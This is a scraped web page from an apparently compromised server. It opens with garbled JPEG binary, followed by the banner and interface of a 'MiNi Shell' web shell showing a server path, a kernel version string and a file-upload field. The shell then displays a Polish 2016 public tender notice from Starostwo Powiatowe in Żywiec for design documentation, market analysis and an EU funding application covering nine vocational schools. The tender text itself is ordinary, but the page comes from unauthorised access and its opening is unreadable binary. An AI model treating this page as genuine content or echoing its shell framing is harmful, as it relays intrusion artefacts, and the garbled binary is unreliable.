JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160114/9616-N-2016.html

<p class="kh_header"><b>Żywiec: Kompleksowe przygotowanie dokumentacji projektowo - techniczno - analitycznej dla zadania Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy</b><br>
<b>Numer ogłoszenia: 9616 - 2016; data zamieszczenia: 14.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Krasińskiego 13, 34-300 Żywiec, woj. śląskie, tel. 33 8605000, faks 33 8605083.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zywiec.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe przygotowanie dokumentacji projektowo - techniczno - analitycznej dla zadania Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowe przygotowanie dokumentacji projektowo - techniczno - analitycznej dla zadania Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy. Efektem prawidłowej realizacji przedmiotu zamówienia jest wykonanie zadań 1-4 opisanych w pkt II.2 Specyfikacji w taki sposób, aby Zamawiający osiągnął zamierzony cel, jakim jest uzyskanie dofinansowania projektu Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego i uzyskanie przez Zamawiającego części dokumentacji niezbędnej dla zadania Rozszerzenie oferty edukacyjnej w celu dostosowania do potrzeb lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach RPO WSL 2014-2020.2 .Szczegółowy opis przedmiotu zamówienia: Kompleksowe przygotowanie dokumentacji projektowo - techniczno - analitycznej dla zadania Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnych Inwestycji Terytorialnych RPO WSL 2014-2020 poprzez: Zadanie nr 1. Wykonanie pełnozakresowej, pełno branżowej i kompletnej dokumentacji projektowo-kosztorysowej w zakresie potrzeb budowlanych, modernizacyjnych i wyposażenia 52 pracowni w  9-ciu szkołach zawodowych oraz pełnienie nadzoru autorskiego nad realizacją robót w oparciu o tę dokumentację. Projekt swym zakresem będzie obejmował 9 szkół zawodowych, ilość pracowni przeznaczonych do modernizacji i wyposażenia oraz szkoły biorące udział w projekcie określa tabela poniżej: L.p. Nazwa szkoły Ilość pracowni modernizowanych  i wyposażanych 1. Zespól Szkół Ogólnokształcących i Technicznych w Milówce - 4; 2. Zespól Szkół Zawodowych i Ogólnokształcących w Węgierskiej Górce - 5; 3. Zespół Szkół Agrotechnicznych i Ogólnokształcących w Żywcu Moszczanicy - 6;  4. Zespół Szkół Budowlano Drzewnych w Żywcu - 7; 5. Zespół Szkół Drzewnych i Leśnych  w Żywcu - 15; 6. Zespół Szkół Samochodowych w  Żywcu - 3; 7. Zespół Szkół Ekonomiczno Gastronomicznych w Żywcu - 3; 8. Zespół Szkół Mechaniczno Elektrycznych w Żywcu - 6; 9. Specjalny Ośrodek Szkolno Wychowawczy w Żywcu - 3; Razem: 52. W załączniku Nr 8 do Specyfikacji znajduje się zakres prac modernizacyjnych i wyposażenia, który należy ująć w dokumentacji projektowej. Zakres dokumentacji projektowej winien uwzględniać specyfikę pracowni i być uzgodniony z dyrektorem szkoły, której dotyczy projekt, po wykonaniu szczegółowej inwentaryzacji budowlanej.  Wykonawca zobowiązany jest uzyskać wszystkie wymagane prawem decyzje administracyjne i uzgodnienia niezbędne do wykonania przedmiotu zamówienia i zapewnienia celu, jakiemu ma służyć. Sale do praktycznej nauki zawodu i laboratoria dydaktyczne należy rozumieć, jako pomieszczenia dydaktyczne do nauki zawodu opisane w Rozporządzeniu Ministra Edukacji Narodowej z dnia 7 lutego 2012 r. w sprawie podstawy programowej kształcenia w zawodach (Dz.U.2012.184). Przez wyposażenie pracowni i warsztatów szkolnych należy rozumieć wyposażenie na liście utworzonej przez Krajowy Ośrodek Wsparcia Edukacji Zawodowej i Ustawicznej (KOWEZiU). Jednocześnie Wykonawca musi sporządzić dokumentację uwzględniając Wytyczne programowe w zakresie kwalifikowania wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego RPO WSL 2014-2020, Wytyczne w zakresie kwalifikowalności wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014-2020 oraz Regionalny Program Operacyjny Województwa Śląskiego na lata 2014-2020 Szczegółowy Opis Osi Priorytetowych. Wykonana dokumentacja projektowa winna zostać zaakceptowana przez poszczególnych Dyrektorów Szkół. Wykonawca winien sporządzić dokumentację dla modernizowanych pracowni w taki sposób, aby przygotowana infrastruktura mogła być w pełni wykorzystana na potrzeby realizacji projektu Rozszerzenie oferty edukacyjnej w celu dostosowania do potrzeb lokalnego rynku pracy, współfinansowanego ze środków Europejskiego Funduszu Społecznego. Projekt Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy, współfinansowany ze środków EFRR jest komplementarny do projektu Rozszerzenie oferty edukacyjnej w celu dostosowania do potrzeb lokalnego rynku pracy, współfinansowanego ze środków EFS. Sporządzona przez wykonawcę dokumentacja projektowa będzie stanowić dla Zamawiającego opis przedmiotu zamówienia w postępowaniach o udzielenie zamówienia publicznego zarówno w zakresie robót budowlanych jak również ujętego w dokumentacji wyposażenia sal do praktycznej nauki zawodu i laboratoriów. Stąd też także opis ujętego w dokumentacji wyposażenia, winien zostać sporządzony zgodnie z wymogami wynikającymi z przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych w szczególności zgodnie z art. 29 i art. 30 ustawy. Zamawiający wymaga, aby dokumentacja projektowa dla każdej szkoły została wykonana w rozbiciu na poszczególne pracownie oraz aby każda dokumentacja zawierała zestawienie kosztów w rozbiciu na koszty robót budowlanych oraz dostaw dla każdej pracowni w danej szkole. Wykonawca przekaże Zamawiającemu: a) wstępny kosztorys realizacji inwestycji rozumiany jako wstępne oszacowanie kosztów realizacji pracowni wraz z wyposażeniem,  z rozbiciem na poszczególne szkoły - w terminie maksymalnym do 45 dni od dnia podpisania umowy (ostateczny termin przekazania wstępnych kosztorysów zostanie  wskazany w umowie, zgodnie z oświadczeniem Wykonawcy wynikającym z Formularza ofertowego). Wskazany przez Zamawiającego termin 45 dni jest maksymalnym terminem na sporządzenie i przekazanie Zamawiającemu wstępnych kosztorysów. Jeżeli Wykonawca nie wskaże w Formularzu ofertowym terminu wykonania i przekazania Zamawiającemu wstępnego kosztorysu realizacji inwestycji, wówczas Zamawiający za termin ten przyjmie maksymalny wymagany termin tj. 45 dni; b) harmonogram  wykonania dokumentacji projektowych, z rozbiciem na poszczególne szkoły - w terminie 7 dni od podpisania umowy. Wykonawca jest również zobowiązany do uzupełniania i dokonywania wszelkich koniecznych korekt dokumentacji projektowo-kosztorysowej, zgodnie z wymaganiami Zamawiającego i Instytucji Zarządzającej do momentu uzyskania ostatecznej oceny wniosku aplikacyjnego bez prawa do dodatkowego wynagrodzenia. Zadanie nr 2.  Opracowanie analizy potrzeb rynku pracy dla projektów Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy oraz Rozszerzenie oferty edukacyjnej w celu dostosowanie do potrzeb lokalnego rynku pracy. a) Analiza potrzeb dla projektu Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach  RPO WSL 2014-2020 winna określać posiadanie jasnej wizji i kompleksowego planu wykorzystania powstałej infrastruktury uwzględniając kwestie demograficzne, stan istniejącej infrastruktury oraz analizę ekonomiczną po zakończeniu projektu. W opracowaniu należy uwzględnić krajowe priorytety polityki szkolnictwa zawodowego oraz konieczność dopasowania kierunku kształcenia do wymagań i potrzeb rynku pracy (diagnoza rynku pracy zrealizowana na podstawie danych statystycznych z ostatnich 3 lat, z uwzględnieniem osób niepełnosprawnych, lub oświadczenie pracodawcy o zapotrzebowaniu na uczniów kształconych w dofinansowanym zawodzie) lub specjalizacji regionalnych (Program Rozwoju Technologii Województwa Śląskiego na lata 2010-2020 i Regionalna Strategia Innowacji Województwa Śląskiego na lata 2013-2020). Przedmiotowa analiza ma być przygotowana na potrzeby opracowania wniosku aplikacyjnego. b) Analiza potrzeb dla projektu Rozszerzenie oferty edukacyjnej w celu dostosowanie do potrzeb lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach RPO WSL 2014-2020 ma pokazać potrzebę podniesienia atrakcyjności i elastyczności kształcenia zawodowego, która będzie odpowiedzią na potrzeby  lokalnego rynku pracy. Przedmiotowa analiza winna być sporządzona na  potrzeby opracowania wniosku aplikacyjnego do EFS.  W opracowaniu powyższych analiz należy uwzględnić indywidualne diagnozy potrzeb szkół oraz wyniki ankiet od przedsiębiorców i szkół, które stanowią Załączniki nr 9 i 6 do Specyfikacji. Wykonawca jest również zobowiązany do uzupełniania i dokonywania wszelkich koniecznych korekt analiz rynku na potrzeby obydwu  projektów, zgodnie z wymaganiami Zamawiającego i Instytucji Zarządzającej do momentu uzyskania ostatecznej oceny wniosku aplikacyjnego bez prawa do dodatkowego wynagrodzenia.  Zadanie nr 3. Opracowanie studium wykonalności wraz z analizą finansową na potrzeby opracowania wniosku aplikacyjnego dla projektu Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL 2014-2020. Studium Wykonalności powinno zawierać w szczególności.: szczegółowy opis projektu, w tym analiza terytorialna, klasyfikacja projektu i zakres interwencji, który ma być zgodny ze Strategią Rozwoju Subregionu Południowego Województwa Śląskiego na lata 2014-2020 oraz Strategią Regionalnych Inwestycji Terytorialnych Subregionu Południowego Województwa Śląskiego na lata  2014-2020,  diagnoza, cele projektu, sposób realizacji celów RPO WSL, wskaźniki produktu, rezultatu,  analiza instytucjonalna i prawna projektu i wnioskodawcy,  utrzymanie celów i trwałości projektu, analiza techniczna projektu: stan aktualny i projektowany,  analiza specyficzna dla sektora, analiza finansowa, analiza ekonomiczna, analiza wrażliwości i ryzyka w projekcie,  powiązanie projektu ze strategiami,  realizacja zasad horyzontalnych w projekcie,  zakres rzeczowo finansowy projektu, analiza oddziaływania na środowisko, oraz inne elementy według potrzeby sporządzenia wniosku aplikacyjnego. Wykonawca jest również zobowiązany do uzupełniania i dokonywania wszelkich koniecznych korekt studium wykonalności oraz analizy finansowej, zgodnie z wymaganiami Zamawiającego i Instytucji Zarządzającej do momentu uzyskania ostatecznej oceny wniosku aplikacyjnego bez prawa do dodatkowego wynagrodzenia.  Zadanie nr 4. Przygotowanie wniosku aplikacyjnego dla projektu Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy w formie elektronicznej, za pomocą systemu teleinformatycznego, tj. Lokalnego Systemu Informatycznego RPO WSL na lata 2014-2020 (dalej LSI)  zgodnie z harmonogramem naboru wniosków ogłoszonym przez Instytucję Zarządzającą.  Wniosek powinien być sporządzony zgodnie z obowiązującym dla przedmiotowego konkursu wytycznymi, regulaminem oraz instrukcjami Instytucji Zarządzającej RPO WSL 2014-2020.  Pierwsza wersja wniosku powinna być dostępna do wglądu w systemie LSI dla Zamawiającego nie później niż 20 dni przed upływem terminu składania wniosku do Instytucji Zarządzającej celem weryfikacji poprawności wniosku. Zamawiający w terminie do 7 dni ma możliwość złożenia uwag w formie pisemnej do Wykonawcy. Ostateczna treść wniosku aplikacyjnego musi zostać uzgodniona z Zamawiającym i uzyskać jego akceptację w terminie nie krótszym niż 7 dni przed upływem terminu naboru wniosków aplikacyjnych wynikających z harmonogramu naboru wniosków ogłoszonych przez Instytucję Zarządzająca. Zaakceptowaną treść wniosku aplikacyjnego Wykonawca jest zobowiązany złożyć do Instytucji Zarządzającej w systemie LSI nie później niż 2 dni przed upływem terminu składania wniosku.  Wykonawca jest również zobowiązany do uzupełniania i dokonywania wszelkich koniecznych korekt wniosku, zgodnie z wymaganiami Zamawiającego i Instytucji Zarządzającej do momentu uzyskania ostatecznej oceny wniosku aplikacyjnego bez prawa do dodatkowego wynagrodzenia. 3. Wykonawca wykona dokumentacje projektowe  i dostarczy Zamawiającemu w wersji papierowej (po 4 egzemplarze oddzielnie dla każdej ze szkół) wraz z oświadczeniem o ich kompletności z punktu widzenia celu, jakiemu ma służyć, oraz  w wersji elektronicznej w formacie PDF. 4. Dokumentacja projektowa powinna być sporządzona w oparciu o rozporządzenie Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r., poz. 1129). 5. Kosztorys inwestorski i przedmiar robót powinny być wykonane zgodnie z obowiązującym rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, z 2004 r., poz. 1389). 6. Dokumentacja powinna być zgodna z ustawą z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, w szczególności z art. 29 - 31 ustawy. 7. Dokumentacja projektowa nie może zawierać sformułowań mogących utrudniać uczciwą konkurencję. 8. W dokumentacji projektowej nie można wskazywać znaków towarowych, patentów lub pochodzenia, chyba, że będzie to uzasadnione specyfiką przedmiotu zamówienia i nie będzie można opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu będą towarzyszyć wyrazy lub równoważny. Dopuszczając możliwość rozwiązania równoważnego, wykonawca winien dokładnie wskazać zakres tej równoważności poprzez precyzyjne określenie wymagań w odniesieniu do dopuszczanego zakresu równoważności. 9. Zamawiający zastrzega sobie prawo do uzyskiwania od Wykonawcy informacji o postępie prac i przyjętych rozwiązaniach w trakcie projektowania, jak również prawa do zgłaszania swoich uwag, które Wykonawca uwzględni w dalszych pracach nad projektem. 10. Wykonawca zobowiązuje się do nieodpłatnego i niezwłocznego udzielania wyjaśnień na ewentualne zapytania oferentów, jakie złożone zostaną w toku przetargu na wykonawstwo robót realizowanych na podstawie wykonanej przez niego dokumentacji projektowo-kosztorysowej, a także zajmowania stanowiska w przypadku wyjaśniania rażąco niskiej ceny ofert wykonawców uczestniczących w postępowaniu o udzielenie zamówienia publicznego, a także w przypadku złożenia odwołania. 11. Termin rękojmi za wady przedmiotu umowy skończy się wraz z upływem terminu odpowiedzialności z tytułu rękojmi i gwarancji za wady robót budowlanych, wykonanych na podstawie dokumentacji będącej przedmiotem niniejszego postępowania. 12. Warunki dodatkowe: Wykonawca zobowiązuje się do wykonania dokumentacji projektowej, stanowiącej przedmiot umowy zgodnie ze zleceniem Zamawiającego, zasadami współczesnej wiedzy technicznej, obowiązującymi w tym zakresie przepisami oraz zgodnie z normami.  Zaleca się oferentom, aby uzyskali wszelkie informacje dla kompleksowego sporządzenia oferty. Wykonawca przejmie na siebie wyłączną odpowiedzialność za wszelkie roszczenia z tytułu praw autorskich związanych z wykonywaną dokumentacją projektową. Zobowiązuje się on ponadto do pokrycia wszelkich kosztów wynikających z popełnionych błędów. 13. Wykonawca zobowiązany jest do osobistego wykonania następujących kluczowych części zamówienia Zadanie nr 2, 3 i 4 o których mowa w pkt II Specyfikacji - opis przedmiotu zamówienia.  14. Powyższy wymóg nie jest skuteczny w zakresie, w jakim Wykonawca powoła się na zasoby innego podmiotu, na zasadach określonych w  art.  26  ust.  2b ustawy,  w  celu  wykazania  spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy.  15. Przedmiot zamówienia jest realizowany w ramach zadania Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego i Rozszerzenie oferty edukacyjnej w celu dostosowanie do potrzeb lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Społecznego - RPO WSL  2014-2020..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 79.31.00.00-0, 71.24.10.00-9, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający przewiduje obowiązek wniesienia wadium przed upływem terminu składania ofert, w wysokości 4 000,00 zł.
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	 pieniądzu (w tytule przelewu należy podać nr sprawy: ZZP.272.2.2016),
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. z 2014 r. Dz. U. poz. 1804).
3.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Starostwa Powiatowego w Żywcu, na konto: Getin Noble Bank Oddział w Bielsku-Białej Filia w Żywcu 37 1560 1023 0000 9140 0000 0253.
4.	Wadium wnoszone w innej formie niż pieniężna, należy składać w kasie Starostwa Powiatowego w Żywcu przy ul. Krasińskiego 13, I piętro, pok. nr 31.
5.	Terminowe wniesienie wadium w formie pieniężnej oznacza, że żądana przez Zamawiającego kwota została wpłacona w pełnej wysokości przelewem na wskazany przez niego rachunek bankowy. Oznacza to, że wniesienie wadium w tej postaci jest skuteczne dopiero z chwilą uznania rachunku Zamawiającego kwotą wadium przed upływem terminu składania ofert.
6.	Wadium wnoszone w innych formach będzie wniesione w terminie, jeżeli stosowny dokument zostanie zdeponowany u Zamawiającego przed upływem terminu składania ofert.
7.	Wykonawca, którego oferta nie zostanie zabezpieczona wadium, zostanie wykluczony z postępowania, a jego oferta uznana za odrzuconą.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę, jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wiedzy i doświadczenia oceniony zostanie na podstawie wykazu wykonanych głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że w tych latach należycie wykonał, co najmniej następujące usługi, polegające na:
1)	sporządzeniu wniosku aplikacyjnego o dofinansowanie ze środków unijnych w obszarze edukacji, o wartości dofinansowania, co najmniej 350 000,00 PLN, który został oceniony pozytywnie, przez Instytucję Zarządzającą; 
2)	wykonaniu analizy potrzeb rynku pracy dla projektów unijnych w obszarze edukacji;
3)	wykonaniu studium wykonalności na potrzeby opracowania wniosków aplikacyjnych dla projektów unijnych.

 wraz z podaniem wartości, przedmiotu, daty wykonania i podmiotu, na rzecz, którego usługa została wykonana (Zał. Nr 3 do Specyfikacji) oraz załączy dowody, że usługi te zostały wykonane należycie.

Usługi, o których mowa w ppkt 1) do 3) mogły zostać wykonane w ramach jednej lub odrębnych umów.

Wykaz głównych usług powinien zawierać usługę potwierdzającą spełnianie opisanego powyżej warunku udziału w postępowaniu.

Dowodami poświadczającymi należytą realizację usług mogą być:

1.	poświadczenia,

2.	oświadczenie wykonawcy, - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w punkcie 1.

W przypadku, gdy to Zamawiający jest podmiotem, na rzecz, którego usługi wskazane w wykazie, o którym mowa wyżej, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów poświadczających ich prawidłową realizację.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie złożonego oświadczenia. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy na druku stanowiącym Załącznik Nr 2 do Specyfikacji, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie złożonego oświadczenia. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy na druku stanowiącym Załącznik Nr 2 do Specyfikacji, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
